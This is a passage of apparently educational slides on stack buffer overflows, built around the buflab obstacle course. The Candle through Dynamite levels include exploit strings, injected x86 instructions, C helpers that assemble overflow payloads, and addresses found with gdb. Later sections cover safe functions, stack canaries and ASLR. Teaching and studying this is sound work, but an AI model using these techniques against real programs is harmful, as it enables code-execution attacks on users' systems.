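   refuses inputs larger than the whole simulated frame. */
void unchecked_read(unsigned char frame[FRAME_SIZE],
                    const unsigned char *input, size_t len) {
    assert(frame != NULL && input != NULL);
    assert(len <= (size_t)FRAME_SIZE);
    memcpy(frame, input, len);   /* starts at buf, may run past it */
}

uint32_t return_address(const unsigned char frame[FRAME_SIZE]) {
    assert(frame != NULL);
    return read_le32(frame + RET_OFF);
}
```

An input of up to 8 bytes leaves the simulated return address untouched. A 16-byte input overwrites buf, the saved ebp, and the return address, so whatever the attacker put in the last four bytes becomes the address the function would return to.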

An obstacle course exercise

We're now going to use what we've learned to start a multi-part obstacle course exercise, where you will learn how to modify return addresses on the stack like an attacker. The obstacle course is in multiple parts, and each obstacle will be harder than the previous one. We will work hands-on through each obstacle, and learn how to smash the stack (i.e., change return addresses).

The optional reading for this part is the article Smashing the Stack for Fun and Profit, by Aleph One. This is linked from the webpage of the course.

An obstacle course exercise

To begin the obstacle course, you will need to download and follow the instructions in the file called buflab.pdf, available from the course webpage. Follow the instructions in buflab.pdf and become familiar with the following programs:
bufbomb
sendstring
makecookie

The best way to familiarize yourself with these programs is to execute them as described in buflab.pdf. All these programs are available inside the virtual machine, in the directory obstacle_course.

An obstacle course exercise

First, familiarize yourself with the reading material in buflab.pdf. This handout contains detailed instructions on how you should approach this obstacle-course exercise. Don't rush through this exercise. Approach this exercise over multiple class sessions, if necessary. It is important to have a solid understanding of this material if you wish to compete in online hacking competitions.

Once you're in Level 0 (Candle), move to the next slide. We will work through this level (and all levels) together. Solutions to all levels are also available in the virtual machine. However, for the best experience, you should try to solve the problem on your own without looking at the solutions, and then compare your work with the solutions provided.

The Candle level (Level 0)

Look at the code in test(). Your objective is to get it to call smoke() when the function returns. Disassemble bufbomb, either within a debugger or using objdump. The code listing is provided for you in the file assembly-bufbomb.txt.

So, how do we get test to call smoke when it finishes execution? Remember, getbuf() is a function that has a buffer overflow. Let's look at the code of getbuf() in the disassembly.

The Candle level (Level 0)

Notice that the stack entry for this function is 0x28 bytes long (%esp is decremented by that amount). Notice also that the value loaded into eax is ebp - 0x14. This line corresponds to the source code of getbuf where the buffer is referenced. This shows that the buffer starts 0x14 = 20 bytes below the value of %ebp. What does the stack look like when getbuf is called?

The Candle level (Level 0)

The stack would look like the picture shown alongside.

[Stack diagram: the return address, the saved value of ebp (ebp points here), and buf (eax points to its start), with esp at the top.]

The offsets are as follows:
esp to ebp: 0x28 (= 40 bytes)
eax to ebp: 0x14 (= 20 bytes)
eax to the return address: 24 bytes (since the saved value of ebp is 4 bytes long)

The Candle level (Level 0)

So this suggests that if we write 24 bytes of junk starting at buf (20 bytes to reach ebp, plus 4 bytes covering the saved value of ebp), followed by the address of the smoke function, we will have accomplished our objective.

The Candle level (Level 0)

You still need to overwrite the return address with the address of smoke. What is it? Look at the assembly code. It is 0x0804898d.

Intel x86 machines follow what is called little-endian notation to store numbers. Exercise: Google "little endian" to learn about this notation.
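Little-endian storage means the least significant byte of a number comes first in memory. The sketch below shows one way to lay out the bytes of a Candle-style input under the offsets worked out above: 24 filler bytes, then the target address with its bytes reversed. The function names are hypothetical, and the filler value 0x30 (the ASCII character '0') is an arbitrary choice made for this sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

enum { FILLER_BYTES = 24, EXPLOIT_BYTES = FILLER_BYTES + 4 };

/* Store a 32-bit value least significant byte first (little endian). */
void put_le32(unsigned char *out, uint32_t value) {
    assert(out != NULL);
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}

/* Fill the distance from buf to the return address with junk, then
   place the target address where the return address lives. */
void build_candle_exploit(unsigned char out[EXPLOIT_BYTES], uint32_t target) {
    assert(out != NULL);
    memset(out, 0x30, FILLER_BYTES);
    put_le32(out + FILLER_BYTES, target);
}
```

For the address 0x0804898d, the last four bytes of the result are 8d 89 04 08, which is the address written backwards one byte at a time.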

The Candle level (Level 0)

A sample solution is provided in candle/exploit.txt. As you can see, there are 24 junk bytes (the value 0x30), followed by the address of smoke in little-endian notation. Run this exploit on bufbomb as instructed in the PDF. The program will invoke smoke!

Review of the Candle level (Level 0)

So what have we learned so far?
That the stack layout is very important to understand.
That you can use gdb or an assembly language listing to understand the stack layout.
That by carefully overwriting the return address, you can cause the program to do unexpected things! Like call smoke()!

We are now ready to proceed to the next level, the Sparkler level.

The Sparkler level (Level 1)

This level is almost identical to the Candle level, except with the additional twist that the bufbomb program recognizes your cookie, and fails if you don't enter the cookie properly. In particular, this is exactly the role of the code in the fizz function. So we have to enter our cookie correctly. For the username alice, the cookie is 0x41f8b226. Let us work through this example using the stack frame.

The Sparkler level (Level 1)

Look at the code for fizz. The main difference, as compared to the smoke() function, is that fizz() accepts an integer argument. How are arguments passed to functions? They are passed through the stack! So we need to ensure that the argument is placed on the stack, above the return address.

The Sparkler level (Level 1)

Our exploit string will pass the argument (the cookie) via the stack. Since the task of overwriting the return address is identical to that in Level 0, we can reuse the same exploit string, with the address of fizz in place of the address of smoke. We only need to append the value of our cookie at the end. Keep in mind that fizz, like any function, expects a return address of its own to sit between the start of its stack entry and its first argument, so check in the sample solution how many bytes separate the overwritten return address from the cookie.

The sample solution is provided in sparkler/exploit.txt. Run it and enjoy!

The Firecracker level (Level 2)

Now that we've completed some simple levels, let's step things up a notch. In both the Candle and Sparkler levels, you got the program to execute code that was already written for you in the bufbomb program (namely, the functions smoke and fizz). In this level, you will exploit the bufbomb program, and get it to execute code of your choosing! (Well, almost.) This is how real-world buffer overflow exploits work, with attackers choosing what code they want the exploit to execute.

The Firecracker level (Level 2)

Let us first examine what this level asks us to do: We have to modify the value of a global variable and set it to the value of our cookie. And then, we have to invoke the bang() function.

One way to approach this level would be to think of replacing the return address of getbuf with that of the bang() function, similar to what we did in Level 0 and Level 1. But that won't change the value of the global variable. So how do we proceed?

The Firecracker level (Level 2)

Ideally, we want our exploit to execute the following pseudocode:

    global_variable = 0x41f8b226;
    invoke bang();

As the manual, buflab.pdf, warns us, we want to stay away from using the x86 call instruction because it uses something called relative addressing.

We need to do the following tasks first:
Locate the address at which global_variable is stored in the program's memory.
Locate where bang is located.
Locate the address at which the variable buf is loaded in program memory.

The Firecracker level (Level 2)

Our overall attack strategy is going to work as follows. We will fill up the buffer with a string that contains three parts:

1. The part labeled A, starting at the beginning of buf, will contain the executable instructions that implement the pseudocode:

    global_variable = 0x41f8b226;
    invoke bang();

2. The part labeled B is simply a filler.
3. Part C overwrites the return address with the start address of buf.

[Stack diagram: C covers the return address, B covers the saved value of ebp and the rest of buf, and A sits at the start of buf.]

The Firecracker level (Level 2)

Examine what happens when getbuf returns: The processor pulls the return address from the stack, which points to the beginning of buf, which contains the code sequence in A. The processor then starts executing the code sequence in A, which contains:

    global_variable = 0x41f8b226;
    invoke bang();

Once this code is executed by the processor, it's mission accomplished!

The Firecracker level (Level 2)

But we still have to figure out:
1. How to write the pseudocode above as machine instructions.
2. The starting address of the buffer buf.

We'll start with the second task, and use gdb to help us out. In particular, we will leverage gdb breakpoints. A breakpoint in gdb tells gdb to pause the program when some condition is satisfied (e.g., the program starts executing a particular instruction). At that point, we can inspect the state of the program using gdb. Let us see how.

The Firecracker level (Level 2)

Load the program in gdb.

The Firecracker level (Level 2)

Disassemble the getbuf function. We know that the Gets function called within getbuf will take buf as an argument, so the address of buf must have been computed before the call. Let us set a breakpoint for address 0x0804db0e.

The Firecracker level (Level 2)

Now run the program within the debugger. From the assembly code of getbuf in the previous slide, we know that the address of buf is loaded in the register %eax, so we can just examine the value of %eax. We want to print the value in hexadecimal, so we use the command p/x $eax, which gives us the address of buf: 0xbfffb7c4.

From the assembly dump of bufbomb, we also know that the address of bang() is 0x08048a21, and that the address of global_variable is 0x0804b100.

Exercise: Try to obtain the address of bang() and the address of global_variable using gdb's features instead.

The Firecracker level (Level 2)

We now have all the information to implement the pseudocode for our attack:

    global_variable = 0x41f8b226;
    invoke bang();

How do we implement the pseudocode? The first instruction is easy, so let's do it first. We will need to write assembly code to implement it, and will then figure out how to write it out as an input to the bufbomb program.

How do you implement global_variable = 0x41f8b226 in assembly code?

    movl $0x41f8b226, (0x0804b100)

This moves the value 0x41f8b226 to the memory at the address 0x0804b100.

The Firecracker level (Level 2)

We would now like to invoke bang() without the call instruction. How? We will leverage the fact that the ret instruction looks for a return address on the stack. Suppose we write the following instructions into region A:

    push $0x08048a21
    ret

0x08048a21 is the address of bang(). The $ sign matters: it tells the assembler to push the number itself, not the contents of memory at that address. We also overwrite the return address at C with the address of buf: 0xbfffb7c4.

The Firecracker level (Level 2)

When getbuf() returns, the processor will start executing the instructions in A, which contains:

    push $0x08048a21
    ret

The stack looks like the picture shown here just before the return from getbuf.

[Stack diagram: C holds 0xbfffb7c4, B is filler, and A holds the push and ret instructions, with ret drawn above push.]

Remember, the stack grows downwards, so the instructions seem as though they are backwards in the picture, but the push is executed before the ret.

The Firecracker level (Level 2)

When getbuf returns, the instruction push $0x08048a21 executes. The push instruction moves %esp down by 4 bytes and stores the value at the new location of %esp.

The Firecracker level (Level 2)

When the push instruction finishes, the value 0x08048a21 is at the top of the stack, where %esp points. The next instruction to execute will be the ret instruction. What does the ret instruction do? It pops the address at the top of the stack, and treats it as the return address. Thus, the processor will transfer control to the location 0x08048a21, the starting address of bang(). Done!

The Firecracker level (Level 2)

Thus, putting it all together, the exploit code written in x86 assembly is:

    movl $0x41f8b226, (0x0804b100)
    push $0x08048a21
    ret

How do we write this all up as an exploit string for the sendstring program? We will use the help of gcc!

The Firecracker level (Level 2)

First, create a file called exploit.s and write the code shown above in it. This is also in exploit.s in the firecracker directory. There are some minor differences, but what is important is the movl, push and ret instructions. The order of movl and push can be switched, but ret has to be the last instruction of the three-instruction sequence.

The Firecracker level (Level 2)

We still need to overwrite the return address with the start address of the buffer, so that when the getbuf function returns, it starts executing the three instructions shown above. How do we do that? Well, we need to somehow write the constant 0xbfffb7c4 (the address of buf) in the space reserved for the return address.

And we'll need to fill up the bytes between the ret instruction and the return address with some padding bytes. That is exactly what the remaining code in exploit.s does. In x86, nop is represented by the byte 0x90.

    nop
    nop
    .long 0xbfffb7c4

The Firecracker level (Level 2)

Now compile this file and obtain the executable code. Let's view the disassembly and figure out the hexadecimal encoding of this instruction sequence.
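To see what the assembler produces, the same byte sequence can be assembled by hand. The sketch below is an illustration, not the contents of the course's exploit.s: build_firecracker is a hypothetical name, the instruction order (push, movl, ret) is one of the two orders the slides allow, and the amount of nop padding assumes the 24-byte distance from buf to the return address found in the Candle level. The opcodes used are the standard x86 encodings: 0x68 for push of a 32-bit constant, 0xc7 0x05 for movl of a constant to an absolute address, 0xc3 for ret, and 0x90 for nop.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum { CODE_BYTES = 16, RET_SLOT = 24, EXPLOIT_BYTES = RET_SLOT + 4 };

/* Store a 32-bit value least significant byte first (little endian). */
static void put_le32(unsigned char *out, uint32_t value) {
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}

/* Lay out: code (part A), nop padding (part B), address of buf (part C). */
void build_firecracker(unsigned char out[EXPLOIT_BYTES], uint32_t cookie,
                       uint32_t global_addr, uint32_t bang_addr,
                       uint32_t buf_addr) {
    size_t i = 0;
    assert(out != NULL);

    out[i++] = 0x68;                        /* push $bang_addr            */
    put_le32(out + i, bang_addr);   i += 4;
    out[i++] = 0xc7; out[i++] = 0x05;       /* movl $cookie, global_addr  */
    put_le32(out + i, global_addr); i += 4;
    put_le32(out + i, cookie);      i += 4;
    out[i++] = 0xc3;                        /* ret                        */
    assert(i == (size_t)CODE_BYTES);

    while (i < (size_t)RET_SLOT)            /* nop padding up to the slot */
        out[i++] = 0x90;
    put_le32(out + i, buf_addr);            /* new return address         */
}
```

With the values from this level (cookie 0x41f8b226, global_variable at 0x0804b100, bang at 0x08048a21, buf at 0xbfffb7c4), the result begins with the bytes 68 21 and ends with ff bf. Compare it byte by byte with the disassembly you obtain in the VM, which remains the authoritative version.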

The Firecracker level (Level 2)

The exploit code in exploit.txt is nothing but the sequence of bytes that represent this sequence. You can just read off the bytes, starting from 68 21 until ff bf. That is your exploit string that you pass to the sendstring program! Done!

The Dynamite level (Level 3)

The Firecracker level taught you how to insert code of your choosing into the buffer that you're writing into. That is how most real-world exploits work. However, the Firecracker level was still easy in that you just caused the exploit to enter the bang function, which executed, and terminated the execution of the entire program.

Let's step things up one notch further, and require that after our exploit code executes, control returns to the invoking function, i.e., test. That is, test should successfully match the value of your cookie, print out the line starting with "Boom!", and the call validate(3) must succeed, i.e., the stack must not be corrupted.

The Dynamite level (Level 3)

Let's work backwards from the validate(3) on line 13. The stack must not be corrupted. That is, we need to ensure that the saved value of %ebp on the stack is restored correctly after our exploit string has been written.

The Dynamite level (Level 3)

Then, the printf() on line 12 should print your cookie. Thus, val should be set to cookie. Where is val set? On line 6, to the return value of getbuf.

The Dynamite level (Level 3)

Thus, the exploit must set the return value of getbuf to the value of your cookie.

The Dynamite level (Level 3)

Now that we have worked through the requirements, let us craft the exploit code. Our overall strategy will be similar to the Firecracker level.

Once the exploit code starts to execute, where should it return to? In Firecracker, we returned to the function bang. In this level, we need to return to the instruction just following the call to getbuf on line 6 of test().

This is what we would return to even without a buffer overflow. However, the catch is that val needs to be set to the value of our cookie.

Looking at the assembly code of test, we find that the location we need to return to is 0x8048aa5.

The Dynamite level (Level 3)

How do we set the return value of getbuf? Let's look at the assembly dump of getbuf. The return value is being passed through the register %eax. Thus, if we can set the value of %eax to our cookie, we're done.

The Dynamite level (Level 3)

Putting these two steps together using the same logic we used for the Firecracker level gives us this code sequence:

    movl $0x41f8b226, %eax
    push $0x08048aa5
    ret

When this code executes, it changes the value of %eax to the cookie, pushes the correct return address on the stack, and invokes ret, causing the processor to start executing at 0x08048aa5.

We need to overwrite the return address on the stack with the start address of this instruction sequence.

The Dynamite level (Level 3)

It's the same buffer we used in the Firecracker level, and we figured out its address using gdb for that level. It was 0xbfffb7c4. We need to overwrite the return address with this value.

But are we done? Can we fill up the buffer buf with arbitrary padding bytes, as in the Firecracker level? Let's see what would happen if we did that.

The Dynamite level (Level 3)

If we fill up the space between the ret instruction and the return address with nop instructions, we will corrupt the saved %ebp on the stack! The consequence will be that when getbuf returns, the stack frame of test will not be restored correctly, and the validate(3) will fail, causing our program to crash.

So we must also take care to restore the value of %ebp on the stack.

[Stack diagram: 0xbfffb7c4 in the return address slot, then the saved ebp, then nop padding, then the ret, movl $0x41f8b226, %eax and push $0x08048aa5 instructions in buf.]

The Dynamite level (Level 3)

How do we figure out the saved value of %ebp? Let's use gdb! The old value of %ebp is stored at the location pointed to by the current %ebp. Just print it out after setting a breakpoint on getbuf. The value is 0xbfffb808. And so, that value needs to be written into the exploit, in the slot for the saved ebp. The gdb screenshot appears on the next slide.

The Nitroglycerine level (Level 5)

The previous four levels cover most of the conceptual aspects of how buffer overflow exploits work. Real-world exploits, however, can get much more complicated, and some of these issues are beyond the scope of a course targeted towards middle-school and high-school students.

Nevertheless, those of you that feel up to the challenge can try your hand at the optional Level 5 (Nitroglycerine) listed in buflab.pdf! HAPPY HACKING!

Buffer Overflow Defenses

Defending against buffer overflow attacks

There is an absolute ton of work on defending against buffer overflow attacks. To this day, this topic remains a subject of active investigation in the computer security community.

For this course, we will study three broad classes of defences that have seen widespread adoption. Many contests, like Cyber Patriot, will also require you to understand and deploy similar defences:
1. Using safe programming constructs
2. Leveraging the compiler to protect the program
3. Leveraging the operating system to protect the program

Why study multiple defences?

Each defence operates under different assumptions and provides different levels of security:

Using safe programming constructs is generally the best option. It protects your program by eliminating the source of the problem, i.e., fixing the buffer overflow vulnerability. However, you need to have access to and be willing to modify the source code to deploy this defence.

Using the compiler is the next best defence. You still need access to source code to recompile, but do not have to modify the source code. This method does not eliminate the vulnerability, it just makes it harder for the attacker to exploit it.

Using the operating system is the third best defence. The benefit is that you don't need access to the program's source code, or even to recompile it. But the cost is that the security that you obtain is much weaker than the above two approaches.

1. Safe programming constructs

Generally speaking, C and C++ provide a number of unsafe programming constructs. Two of the most popular unsafe constructs are gets and strcpy. These functions are unsafe because they do not check the size of the buffer into which they write data.

To eliminate the buffer overflow vulnerability, these need to be replaced with their safer versions, fgets and strncpy. The safer functions take the size of the buffer as an argument and never write more than that many bytes.
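As an illustration of the safer constructs, here is a minimal sketch of two wrappers around strncpy and fgets. The wrapper names bounded_copy and bounded_read_line are hypothetical and are not taken from the course's safe_programming.c. One detail worth knowing: strncpy does not add the terminating '\0' when the source string is too long, so the wrapper adds it explicitly.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Copy src into dst without writing past dst_size bytes. The result is
   always a properly terminated string, truncated if necessary. */
void bounded_copy(char *dst, size_t dst_size, const char *src) {
    assert(dst != NULL && src != NULL && dst_size > 0);
    strncpy(dst, src, dst_size - 1);
    dst[dst_size - 1] = '\0';
}

/* Read one line from in. fgets stores at most dst_size - 1 characters
   plus a terminating '\0', so dst cannot overflow. Returns 1 on
   success and 0 on end of input or error. */
int bounded_read_line(char *dst, size_t dst_size, FILE *in) {
    assert(dst != NULL && in != NULL && dst_size > 0);
    if (fgets(dst, (int)dst_size, in) == NULL)
        return 0;
    dst[strcspn(dst, "\n")] = '\0';   /* drop the trailing newline, if any */
    return 1;
}
```

With an 8-byte buffer, bounded_copy keeps only the first 7 characters of a longer string, and bounded_read_line(buf, sizeof buf, stdin) reads at most 7 characters of a line, however long the input is. The extra input is cut off instead of spilling into the rest of the stack.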

1. Safe programming constructs

Open the file called safe_programming.c in the VM. This file implements four functions, two that use unsafe programming constructs and two that use the corresponding safe constructs.

Exercise: Invoke one function at a time and recompile the program. Each time, try to feed a long string (for gets) and observe the behaviour of the program. What happens in each case? Why?

1. Safe programming constructs

You can learn about safe and unsafe programming constructs using UNIX man pages. Study the constructs using the following command lines:

    man gets
    man fgets
    man strcpy
    man strncpy

These are not the only such constructs in C. Learn about more safe and unsafe programming constructs using UNIX man pages (or with the help of Google). Are the following safe or unsafe?
strcat
strncat
strlcpy
strlcat

1. Safe programming constructs

Using safe programming constructs is not the only way to eliminate buffer overflow vulnerabilities. There are many more ways in which vulnerabilities happen. The best way to find and fix vulnerabilities is to use the help of programming tools that are widely available today:

Compilers often emit warnings about the use of unsafe functions.

UNIX tools such as lint, dlint, and commercial tools such as Grammatech CodeSonar and HP Fortify specialize in finding potential buffer overflow sites in the program.

These tools help focus programmer attention to find and fix bugs before software is deployed.

197 2. Using the compiler Modern compilers, such as newer versions of gcc, also provide a measure of protection against buffer overflows. They do this by protecting the return address on the stack. Take safe-programming.c and do the following:
gcc -fno-stack-protector safe-programming.c -o unsafe.o
gcc safe-programming.c -o safe.o
Now, disassemble safe.o and unsafe.o using objdump and study the differences (pick one function in each to study the differences). In the safe version, you see calls to __stack_chk_fail. What do you think it does? 198

2. Using the compiler Obtain a safe version that calls the function gets_user_input and try to feed a long input that would normally cause the program to segfault. Instead of a segfault, you see an error message saying that stack smashing was detected, and the program is terminated. Now run the unsafe version with the same input. It segfaults. The error message is the runtime behaviour of the function __stack_chk_fail. It is called when the program detects a stack smashing attempt, i.e., an attempt to overwrite the return address. 199

2. Using the compiler How is this functionality implemented? The compiler places a random value, called a canary, on the stack between the function's local variables and its return address, and keeps a copy of that value elsewhere in memory. Just before the function returns, it checks that the canary on the stack still matches the saved copy. An overflow that reaches the return address must overwrite the canary first, so a mismatch means that the stack has been smashed. In that case the function calls __stack_chk_fail, which aborts the program, as you just saw, thus preventing an exploit from succeeding! 200 2. Using the compiler Modern compilers (e.g., gcc as configured on most modern Linux distributions) enable stack protection by default. You have to explicitly disable it if you don't want it. Why would one choose to disable something good like stack protection? Compile the program safe_programming/lots_of_calls.c with gcc stack protection and without stack protection. Run both programs and time them. What do you see?

201 2. Using the compiler There is a performance cost for stack protection. Although this is a simple example, in real-world programs, even small performance differences matter. Thus, sometimes developers choose to turn off stack protection. 202 3. Operating system based defenses There are a number of ways in which operating systems can be used to harden programs against attack. We will look at one of them, called address-space layout randomization, or ASLR. Let us first study ASLR in practice. Your virtual machine has ASLR disabled, and we will study the effect of ASLR

by observing the behaviour of a program with and without it. 203 3. Operating system based defenses First, let us confirm that ASLR is disabled in your VM. Run cat /proc/sys/kernel/randomize_va_space. This file should contain a single entry, 0, if ASLR is disabled. Now open the file aslr/aslr.c and study its contents. It prints out the address of a buffer that is allocated locally within the main function. Compile and run this program multiple times and observe its output. What do you see? You should see that buf is always allocated at the same address. 204

3. Operating system based defenses Now let us enable ASLR in your VM. The directions to do so are in the file called ASLR_README.txt in the aslr directory. Ensure that you reboot the VM (type reboot on the command line). Run cat /proc/sys/kernel/randomize_va_space. This file should contain a single entry, 2, if ASLR is enabled. As before, compile and run aslr.c multiple times and observe its output. If you have the compiled code from the previous slide, there is no need to even recompile. What do you see? 205 3. Operating system based defenses Now what do you see? You should see that buf is allocated at

different addresses each time! What's going on and why? Let us study this in detail. 206 3. Operating system based defenses The operating system is randomizing the address-space layout of the program. In this case, it is adding a random amount of padding to the base of the stack (see picture). Each time you run the program, the amount of padding added to the stack base is different. As a result, the precise address of buf is different for each run

of the program. 207 [Figure: stack layout showing the random amount of padding and buf] 3. Operating system based defenses Why does adding padding make it difficult to write an exploit? Recall Level-2 (Firecracker) of the obstacle course exercise. One of your tasks was to overwrite the return address with the address of buf. If you, the attacker, have to do this, you're going to have a hard time

guessing the address of buf! 208 [Figure: stack layout showing the random amount of padding, the address of buf, and buf] 3. Operating system based defenses Do the following exercise: For each of the 5 levels of the obstacle course, run your exploit strings again in your VM with ASLR enabled. For which levels do the same exploit strings work? For which levels do the exploit strings no longer work? Explain why ASLR defeats the exploits for those levels.

Once you complete this exercise, disable ASLR using the instructions in ASLR_README.txt and reboot. You will need to disable ASLR in case you wish to revisit any of the other exercises in this course, since they have been designed to work with ASLR disabled. 209
